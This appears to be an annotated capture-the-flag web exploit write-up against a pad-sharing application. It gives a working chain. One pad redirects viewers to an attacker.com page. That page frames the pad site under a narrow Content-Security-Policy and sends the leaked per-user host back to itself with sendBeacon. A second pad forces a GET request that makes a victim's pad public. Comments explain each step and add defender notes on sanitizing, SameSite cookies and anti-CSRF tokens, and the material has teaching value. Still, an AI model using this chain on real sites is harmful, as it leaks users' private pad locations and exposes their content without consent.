Tags: web
tl;dr
First pad
<!-- Content of the first pad (per the heading above): one second after the pad is
     rendered, this meta refresh navigates the viewer's browser to the external page
     https://attacker.com/attacker.html.
     Defender note: the redirect depends on the pad rendering author-supplied
     <meta http-equiv> tags; stripping them when sanitizing pad content blocks this step. -->
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">
Page served at https://attacker.com/attacker.html:
<!-- External page that frames the pad site under a narrow frame-src policy and reports
     every CSP violation it observes back to its own URL. -->
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- frame-src allows only this page's own origin plus one exact host, which is the
     punycode spelling of the host used in the iframe below. There is no subdomain
     wildcard, so a frame navigation to any other host, subdomains included, violates
     the policy and raises a securitypolicyviolation event. -->
<meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
<title>TEST</title>
</head>
<body>
<!-- The handler logs each violation event and sends event.blockedURI to this page's own
     URL with navigator.sendBeacon (an HTTP POST). It is declared async but awaits nothing.
     NOTE(review): presumably /p/latest redirects a logged-in visitor to their per-pad
     host, so the blocked URI would disclose that host to this page; confirm against the
     pad application.
     Defender note: a hostname should not be the only secret protecting a pad. Session
     cookies set with SameSite=Lax or Strict are not sent on cross-site frame loads, and
     a Fetch Metadata check (Sec-Fetch-Site, Sec-Fetch-Dest) lets the server refuse the
     per-user redirect for cross-site framed requests. -->
<script>
document.addEventListener('securitypolicyviolation', async function (event) {
console.log(event)
navigator.sendBeacon(location.href,event.blockedURI)
});
</script>
<!-- Frame request to the pad site's /p/latest path. The requested host matches the
     policy above, so a violation here would have to come from a redirect to a
     different host. -->
<iframe src="https://päääd.space/p/latest"></iframe>
</body>
</html>
Second pad
<!-- Content of the second pad: one second after rendering, this meta refresh is meant to
     send the viewer's browser to the pad host with the query ?edit=isPublic, which per
     the writeup makes that pad public. unique_id is presumably a placeholder for the
     per-pad host label.
     Defender note: a visibility change triggered by a plain navigation (GET) is a CSRF
     weakness; state changes should require a POST carrying an anti-CSRF token, backed by
     SameSite session cookies. -->
<meta http-equiv="refresh" content="1; url=unique_id.xn--pd-viaaa.space?edit=isPublic">